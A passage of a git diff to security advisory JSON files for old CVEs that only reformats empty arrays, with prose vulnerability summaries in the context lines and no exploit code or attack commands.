diff --git a/advisories/unreviewed/2022/05/GHSA-4wh7-mq9j-whxw/GHSA-4wh7-mq9j-whxw.json b/advisories/unreviewed/2022/05/GHSA-4wh7-mq9j-whxw/GHSA-4wh7-mq9j-whxw.json
index 3f6857f261b..8d4bc9598f9 100644
--- a/advisories/unreviewed/2022/05/GHSA-4wh7-mq9j-whxw/GHSA-4wh7-mq9j-whxw.json
+++ b/advisories/unreviewed/2022/05/GHSA-4wh7-mq9j-whxw/GHSA-4wh7-mq9j-whxw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4x87-37h3-grrr/GHSA-4x87-37h3-grrr.json b/advisories/unreviewed/2022/05/GHSA-4x87-37h3-grrr/GHSA-4x87-37h3-grrr.json
index 6f75048f65e..6c7acaf9878 100644
--- a/advisories/unreviewed/2022/05/GHSA-4x87-37h3-grrr/GHSA-4x87-37h3-grrr.json
+++ b/advisories/unreviewed/2022/05/GHSA-4x87-37h3-grrr/GHSA-4x87-37h3-grrr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-52fh-662w-2pg3/GHSA-52fh-662w-2pg3.json b/advisories/unreviewed/2022/05/GHSA-52fh-662w-2pg3/GHSA-52fh-662w-2pg3.json
index a5ec73cf37e..10ee84355b0 100644
--- a/advisories/unreviewed/2022/05/GHSA-52fh-662w-2pg3/GHSA-52fh-662w-2pg3.json
+++ b/advisories/unreviewed/2022/05/GHSA-52fh-662w-2pg3/GHSA-52fh-662w-2pg3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-555j-rfj9-g39m/GHSA-555j-rfj9-g39m.json b/advisories/unreviewed/2022/05/GHSA-555j-rfj9-g39m/GHSA-555j-rfj9-g39m.json
index 5e1d26abad3..d4b903443f7 100644
--- a/advisories/unreviewed/2022/05/GHSA-555j-rfj9-g39m/GHSA-555j-rfj9-g39m.json
+++ b/advisories/unreviewed/2022/05/GHSA-555j-rfj9-g39m/GHSA-555j-rfj9-g39m.json
@@ -7,12 +7,8 @@
"CVE-2014-4540"
],
"details": "Cross-site scripting (XSS) vulnerability in oleggo-twitter/twitter_login_form.php in the Oleggo LiveStream plugin 0.2.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the msg parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-55g3-7rvc-rxxm/GHSA-55g3-7rvc-rxxm.json b/advisories/unreviewed/2022/05/GHSA-55g3-7rvc-rxxm/GHSA-55g3-7rvc-rxxm.json
index f8bde3d65bc..a53674a9952 100644
--- a/advisories/unreviewed/2022/05/GHSA-55g3-7rvc-rxxm/GHSA-55g3-7rvc-rxxm.json
+++ b/advisories/unreviewed/2022/05/GHSA-55g3-7rvc-rxxm/GHSA-55g3-7rvc-rxxm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-57x5-vvhv-rvxm/GHSA-57x5-vvhv-rvxm.json b/advisories/unreviewed/2022/05/GHSA-57x5-vvhv-rvxm/GHSA-57x5-vvhv-rvxm.json
index 588024198f8..118d48bbe9c 100644
--- a/advisories/unreviewed/2022/05/GHSA-57x5-vvhv-rvxm/GHSA-57x5-vvhv-rvxm.json
+++ b/advisories/unreviewed/2022/05/GHSA-57x5-vvhv-rvxm/GHSA-57x5-vvhv-rvxm.json
@@ -7,12 +7,8 @@
"CVE-2013-6124"
],
"details": "The Qualcomm Innovation Center (QuIC) init scripts in Code Aurora Forum (CAF) releases of Android 4.1.x through 4.4.x allow local users to modify file metadata via a symlink attack on a file accessed by a (1) chown or (2) chmod command, as demonstrated by changing the permissions of an arbitrary file via an attack on the sensor-settings file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-589g-jvw3-2rm2/GHSA-589g-jvw3-2rm2.json b/advisories/unreviewed/2022/05/GHSA-589g-jvw3-2rm2/GHSA-589g-jvw3-2rm2.json
index 2bb0292ddd3..2f85a962971 100644
--- a/advisories/unreviewed/2022/05/GHSA-589g-jvw3-2rm2/GHSA-589g-jvw3-2rm2.json
+++ b/advisories/unreviewed/2022/05/GHSA-589g-jvw3-2rm2/GHSA-589g-jvw3-2rm2.json
@@ -7,12 +7,8 @@
"CVE-2014-3491"
],
"details": "Cross-site scripting (XSS) vulnerability in Foreman before 1.4.5 and 1.5.x before 1.5.1 allows remote attackers to inject arbitrary web script or HTML via the Name field to the New Host groups page, related to create, update, and destroy notification boxes.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-58c9-m4j7-84m4/GHSA-58c9-m4j7-84m4.json b/advisories/unreviewed/2022/05/GHSA-58c9-m4j7-84m4/GHSA-58c9-m4j7-84m4.json
index a5bbe988ed2..ac59b58e5db 100644
--- a/advisories/unreviewed/2022/05/GHSA-58c9-m4j7-84m4/GHSA-58c9-m4j7-84m4.json
+++ b/advisories/unreviewed/2022/05/GHSA-58c9-m4j7-84m4/GHSA-58c9-m4j7-84m4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-58h2-44g5-32cg/GHSA-58h2-44g5-32cg.json b/advisories/unreviewed/2022/05/GHSA-58h2-44g5-32cg/GHSA-58h2-44g5-32cg.json
index f86c8eec274..c7e365902ec 100644
--- a/advisories/unreviewed/2022/05/GHSA-58h2-44g5-32cg/GHSA-58h2-44g5-32cg.json
+++ b/advisories/unreviewed/2022/05/GHSA-58h2-44g5-32cg/GHSA-58h2-44g5-32cg.json
@@ -7,12 +7,8 @@
"CVE-2014-3902"
],
"details": "The CyberAgent Ameba application 3.x and 4.x before 4.5.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-59v8-q5hp-9q95/GHSA-59v8-q5hp-9q95.json b/advisories/unreviewed/2022/05/GHSA-59v8-q5hp-9q95/GHSA-59v8-q5hp-9q95.json
index cd6127f1a20..afe6f2ac3f1 100644
--- a/advisories/unreviewed/2022/05/GHSA-59v8-q5hp-9q95/GHSA-59v8-q5hp-9q95.json
+++ b/advisories/unreviewed/2022/05/GHSA-59v8-q5hp-9q95/GHSA-59v8-q5hp-9q95.json
@@ -7,12 +7,8 @@
"CVE-2014-3161"
],
"details": "The WebMediaPlayerAndroid::load function in content/renderer/media/android/webmediaplayer_android.cc in Google Chrome before 36.0.1985.122 on Android does not properly interact with redirects, which allows remote attackers to bypass the Same Origin Policy via a crafted web site that hosts a video stream.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-5fjp-h5ph-254r/GHSA-5fjp-h5ph-254r.json b/advisories/unreviewed/2022/05/GHSA-5fjp-h5ph-254r/GHSA-5fjp-h5ph-254r.json
index f3e062759fd..763c3f2a96b 100644
--- a/advisories/unreviewed/2022/05/GHSA-5fjp-h5ph-254r/GHSA-5fjp-h5ph-254r.json
+++ b/advisories/unreviewed/2022/05/GHSA-5fjp-h5ph-254r/GHSA-5fjp-h5ph-254r.json
@@ -7,12 +7,8 @@
"CVE-2014-3816"
],
"details": "Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R11, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D30, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8-S2, 12.3 before 12.3R7, 13.1 before 13.1R4-S2, 13.2 before 13.2R5, 13.3 before 13.3R2-S2, and 14.1 before 14.1R1 allows remote authenticated users to gain privileges via unspecified combinations of CLI commands and arguments.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-5gwv-q5pw-ggrw/GHSA-5gwv-q5pw-ggrw.json b/advisories/unreviewed/2022/05/GHSA-5gwv-q5pw-ggrw/GHSA-5gwv-q5pw-ggrw.json
index f03deb403ef..9918efd07e2 100644
--- a/advisories/unreviewed/2022/05/GHSA-5gwv-q5pw-ggrw/GHSA-5gwv-q5pw-ggrw.json
+++ b/advisories/unreviewed/2022/05/GHSA-5gwv-q5pw-ggrw/GHSA-5gwv-q5pw-ggrw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5hqf-prg4-35qm/GHSA-5hqf-prg4-35qm.json b/advisories/unreviewed/2022/05/GHSA-5hqf-prg4-35qm/GHSA-5hqf-prg4-35qm.json
index 302b0259cb8..2ebf10a53be 100644
--- a/advisories/unreviewed/2022/05/GHSA-5hqf-prg4-35qm/GHSA-5hqf-prg4-35qm.json
+++ b/advisories/unreviewed/2022/05/GHSA-5hqf-prg4-35qm/GHSA-5hqf-prg4-35qm.json
@@ -7,12 +7,8 @@
"CVE-2014-4551"
],
"details": "Cross-site scripting (XSS) vulnerability in diagnostics/test.php in the Social Connect plugin 1.0.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the testing parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5j3q-vmj5-h7fx/GHSA-5j3q-vmj5-h7fx.json b/advisories/unreviewed/2022/05/GHSA-5j3q-vmj5-h7fx/GHSA-5j3q-vmj5-h7fx.json
index b194d6df4bc..3b3112e58b3 100644
--- a/advisories/unreviewed/2022/05/GHSA-5j3q-vmj5-h7fx/GHSA-5j3q-vmj5-h7fx.json
+++ b/advisories/unreviewed/2022/05/GHSA-5j3q-vmj5-h7fx/GHSA-5j3q-vmj5-h7fx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5jx6-vwcr-r4rq/GHSA-5jx6-vwcr-r4rq.json b/advisories/unreviewed/2022/05/GHSA-5jx6-vwcr-r4rq/GHSA-5jx6-vwcr-r4rq.json
index 3db85c0c841..3445c639158 100644
--- a/advisories/unreviewed/2022/05/GHSA-5jx6-vwcr-r4rq/GHSA-5jx6-vwcr-r4rq.json
+++ b/advisories/unreviewed/2022/05/GHSA-5jx6-vwcr-r4rq/GHSA-5jx6-vwcr-r4rq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-5m38-m947-59q9/GHSA-5m38-m947-59q9.json b/advisories/unreviewed/2022/05/GHSA-5m38-m947-59q9/GHSA-5m38-m947-59q9.json
index fc78e3c63fd..9fcf5267053 100644
--- a/advisories/unreviewed/2022/05/GHSA-5m38-m947-59q9/GHSA-5m38-m947-59q9.json
+++ b/advisories/unreviewed/2022/05/GHSA-5m38-m947-59q9/GHSA-5m38-m947-59q9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5mm2-4pw5-g3w5/GHSA-5mm2-4pw5-g3w5.json b/advisories/unreviewed/2022/05/GHSA-5mm2-4pw5-g3w5/GHSA-5mm2-4pw5-g3w5.json
index d6374136373..4ea416cdd3d 100644
--- a/advisories/unreviewed/2022/05/GHSA-5mm2-4pw5-g3w5/GHSA-5mm2-4pw5-g3w5.json
+++ b/advisories/unreviewed/2022/05/GHSA-5mm2-4pw5-g3w5/GHSA-5mm2-4pw5-g3w5.json
@@ -7,12 +7,8 @@
"CVE-2014-4521"
],
"details": "Cross-site scripting (XSS) vulnerability in client-assist.php in the dsIDXpress IDX plugin before 2.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5p25-jv7x-3c98/GHSA-5p25-jv7x-3c98.json b/advisories/unreviewed/2022/05/GHSA-5p25-jv7x-3c98/GHSA-5p25-jv7x-3c98.json
index 538d57b54f1..bcf6259ed8b 100644
--- a/advisories/unreviewed/2022/05/GHSA-5p25-jv7x-3c98/GHSA-5p25-jv7x-3c98.json
+++ b/advisories/unreviewed/2022/05/GHSA-5p25-jv7x-3c98/GHSA-5p25-jv7x-3c98.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-5pqm-hfmj-g8jg/GHSA-5pqm-hfmj-g8jg.json b/advisories/unreviewed/2022/05/GHSA-5pqm-hfmj-g8jg/GHSA-5pqm-hfmj-g8jg.json
index b5deca1b1ee..4f5982381b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-5pqm-hfmj-g8jg/GHSA-5pqm-hfmj-g8jg.json
+++ b/advisories/unreviewed/2022/05/GHSA-5pqm-hfmj-g8jg/GHSA-5pqm-hfmj-g8jg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5q7f-gfg3-whhx/GHSA-5q7f-gfg3-whhx.json b/advisories/unreviewed/2022/05/GHSA-5q7f-gfg3-whhx/GHSA-5q7f-gfg3-whhx.json
index 3da877d06f6..b6e1134daae 100644
--- a/advisories/unreviewed/2022/05/GHSA-5q7f-gfg3-whhx/GHSA-5q7f-gfg3-whhx.json
+++ b/advisories/unreviewed/2022/05/GHSA-5q7f-gfg3-whhx/GHSA-5q7f-gfg3-whhx.json
@@ -7,12 +7,8 @@
"CVE-2014-4528"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in admin/swarm-settings.php in the Bugs Go Viral : Facebook Promotion Generator (fbpromotions) plugin 1.3.4 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) promo_type, (2) fb_edit_action, or (3) promo_id parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5vvg-7wfp-qh9p/GHSA-5vvg-7wfp-qh9p.json b/advisories/unreviewed/2022/05/GHSA-5vvg-7wfp-qh9p/GHSA-5vvg-7wfp-qh9p.json
index 643fc853352..b4d7fe60960 100644
--- a/advisories/unreviewed/2022/05/GHSA-5vvg-7wfp-qh9p/GHSA-5vvg-7wfp-qh9p.json
+++ b/advisories/unreviewed/2022/05/GHSA-5vvg-7wfp-qh9p/GHSA-5vvg-7wfp-qh9p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5vw4-99jh-f2hp/GHSA-5vw4-99jh-f2hp.json b/advisories/unreviewed/2022/05/GHSA-5vw4-99jh-f2hp/GHSA-5vw4-99jh-f2hp.json
index dbb09ede998..f76fcbb1144 100644
--- a/advisories/unreviewed/2022/05/GHSA-5vw4-99jh-f2hp/GHSA-5vw4-99jh-f2hp.json
+++ b/advisories/unreviewed/2022/05/GHSA-5vw4-99jh-f2hp/GHSA-5vw4-99jh-f2hp.json
@@ -7,12 +7,8 @@
"CVE-2012-6651"
],
"details": "Multiple directory traversal vulnerabilities in the Vitamin plugin before 1.1.0 for WordPress allow remote attackers to access arbitrary files via a .. (dot dot) in the path parameter to (1) add_headers.php or (2) minify.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5w9g-vrj4-xwgh/GHSA-5w9g-vrj4-xwgh.json b/advisories/unreviewed/2022/05/GHSA-5w9g-vrj4-xwgh/GHSA-5w9g-vrj4-xwgh.json
index a3b921c2a67..e99878ad01f 100644
--- a/advisories/unreviewed/2022/05/GHSA-5w9g-vrj4-xwgh/GHSA-5w9g-vrj4-xwgh.json
+++ b/advisories/unreviewed/2022/05/GHSA-5w9g-vrj4-xwgh/GHSA-5w9g-vrj4-xwgh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-5x62-f5vq-c3w4/GHSA-5x62-f5vq-c3w4.json b/advisories/unreviewed/2022/05/GHSA-5x62-f5vq-c3w4/GHSA-5x62-f5vq-c3w4.json
index 806cdf673e2..bf5182b7278 100644
--- a/advisories/unreviewed/2022/05/GHSA-5x62-f5vq-c3w4/GHSA-5x62-f5vq-c3w4.json
+++ b/advisories/unreviewed/2022/05/GHSA-5x62-f5vq-c3w4/GHSA-5x62-f5vq-c3w4.json
@@ -7,12 +7,8 @@
"CVE-2014-0607"
],
"details": "Unrestricted file upload vulnerability in Attachmate Verastream Process Designer (VPD) before R6 SP1 Hotfix 1 allows remote attackers to execute arbitrary code by uploading and launching an executable file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json
index 8ec48c5fd28..a40bc07293f 100644
--- a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json
+++ b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-62g9-6vhp-3657/GHSA-62g9-6vhp-3657.json b/advisories/unreviewed/2022/05/GHSA-62g9-6vhp-3657/GHSA-62g9-6vhp-3657.json
index fa8eb6eea64..3094eecb080 100644
--- a/advisories/unreviewed/2022/05/GHSA-62g9-6vhp-3657/GHSA-62g9-6vhp-3657.json
+++ b/advisories/unreviewed/2022/05/GHSA-62g9-6vhp-3657/GHSA-62g9-6vhp-3657.json
@@ -7,12 +7,8 @@
"CVE-2014-4573"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in frame-maker.php in the Walk Score plugin 0.5.5 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) s or (2) o parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-63q3-pfpw-33gj/GHSA-63q3-pfpw-33gj.json b/advisories/unreviewed/2022/05/GHSA-63q3-pfpw-33gj/GHSA-63q3-pfpw-33gj.json
index 8dccc301155..6687350fbd3 100644
--- a/advisories/unreviewed/2022/05/GHSA-63q3-pfpw-33gj/GHSA-63q3-pfpw-33gj.json
+++ b/advisories/unreviewed/2022/05/GHSA-63q3-pfpw-33gj/GHSA-63q3-pfpw-33gj.json
@@ -7,12 +7,8 @@
"CVE-2014-4579"
],
"details": "Cross-site scripting (XSS) vulnerability in js/test.php in the Appointments Scheduler plugin 1.5 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the lang parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-63xg-2ggr-xj5w/GHSA-63xg-2ggr-xj5w.json b/advisories/unreviewed/2022/05/GHSA-63xg-2ggr-xj5w/GHSA-63xg-2ggr-xj5w.json
index a388530332d..8e65d1f1ba4 100644
--- a/advisories/unreviewed/2022/05/GHSA-63xg-2ggr-xj5w/GHSA-63xg-2ggr-xj5w.json
+++ b/advisories/unreviewed/2022/05/GHSA-63xg-2ggr-xj5w/GHSA-63xg-2ggr-xj5w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-64fg-mxf8-vcp4/GHSA-64fg-mxf8-vcp4.json b/advisories/unreviewed/2022/05/GHSA-64fg-mxf8-vcp4/GHSA-64fg-mxf8-vcp4.json
index f35c8145937..3095f5ae26b 100644
--- a/advisories/unreviewed/2022/05/GHSA-64fg-mxf8-vcp4/GHSA-64fg-mxf8-vcp4.json
+++ b/advisories/unreviewed/2022/05/GHSA-64fg-mxf8-vcp4/GHSA-64fg-mxf8-vcp4.json
@@ -7,12 +7,8 @@
"CVE-2014-4585"
],
"details": "Cross-site scripting (XSS) vulnerability in the WP-FaceThumb plugin possibly 1.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the ajax_url parameter to index.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-652f-5x24-rqp5/GHSA-652f-5x24-rqp5.json b/advisories/unreviewed/2022/05/GHSA-652f-5x24-rqp5/GHSA-652f-5x24-rqp5.json
index 4db1dff35aa..01c867529c6 100644
--- a/advisories/unreviewed/2022/05/GHSA-652f-5x24-rqp5/GHSA-652f-5x24-rqp5.json
+++ b/advisories/unreviewed/2022/05/GHSA-652f-5x24-rqp5/GHSA-652f-5x24-rqp5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6545-45rg-p2vp/GHSA-6545-45rg-p2vp.json b/advisories/unreviewed/2022/05/GHSA-6545-45rg-p2vp/GHSA-6545-45rg-p2vp.json
index fc460b022b8..ac43c2fb039 100644
--- a/advisories/unreviewed/2022/05/GHSA-6545-45rg-p2vp/GHSA-6545-45rg-p2vp.json
+++ b/advisories/unreviewed/2022/05/GHSA-6545-45rg-p2vp/GHSA-6545-45rg-p2vp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-65w7-v7rw-7gmm/GHSA-65w7-v7rw-7gmm.json b/advisories/unreviewed/2022/05/GHSA-65w7-v7rw-7gmm/GHSA-65w7-v7rw-7gmm.json
index e4880562b07..0440fcb2895 100644
--- a/advisories/unreviewed/2022/05/GHSA-65w7-v7rw-7gmm/GHSA-65w7-v7rw-7gmm.json
+++ b/advisories/unreviewed/2022/05/GHSA-65w7-v7rw-7gmm/GHSA-65w7-v7rw-7gmm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-66m8-64xr-mvh7/GHSA-66m8-64xr-mvh7.json b/advisories/unreviewed/2022/05/GHSA-66m8-64xr-mvh7/GHSA-66m8-64xr-mvh7.json
index 0ee03aacc00..b161ff4fd0d 100644
--- a/advisories/unreviewed/2022/05/GHSA-66m8-64xr-mvh7/GHSA-66m8-64xr-mvh7.json
+++ b/advisories/unreviewed/2022/05/GHSA-66m8-64xr-mvh7/GHSA-66m8-64xr-mvh7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-68cf-fqcp-pmj9/GHSA-68cf-fqcp-pmj9.json b/advisories/unreviewed/2022/05/GHSA-68cf-fqcp-pmj9/GHSA-68cf-fqcp-pmj9.json
index 3e2368d343d..77271ee7b24 100644
--- a/advisories/unreviewed/2022/05/GHSA-68cf-fqcp-pmj9/GHSA-68cf-fqcp-pmj9.json
+++ b/advisories/unreviewed/2022/05/GHSA-68cf-fqcp-pmj9/GHSA-68cf-fqcp-pmj9.json
@@ -7,12 +7,8 @@
"CVE-2014-5113"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in test.php in Visualware MyConnection Server 9.7i allow remote attackers to inject arbitrary web script or HTML via the (1) testtype, (2) ver, (3) cm, (4) map, (5) lines, (6) pps, (7) bpp, (8) codec, (9) provtext, (10) provtextextra, (11) provlink, or (12) duration parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-68v6-4gjc-qv2v/GHSA-68v6-4gjc-qv2v.json b/advisories/unreviewed/2022/05/GHSA-68v6-4gjc-qv2v/GHSA-68v6-4gjc-qv2v.json
index eef0b613cdd..891c270a727 100644
--- a/advisories/unreviewed/2022/05/GHSA-68v6-4gjc-qv2v/GHSA-68v6-4gjc-qv2v.json
+++ b/advisories/unreviewed/2022/05/GHSA-68v6-4gjc-qv2v/GHSA-68v6-4gjc-qv2v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6fjv-rgvm-7x24/GHSA-6fjv-rgvm-7x24.json b/advisories/unreviewed/2022/05/GHSA-6fjv-rgvm-7x24/GHSA-6fjv-rgvm-7x24.json
index c64aaae1d44..a94f3dfa8e9 100644
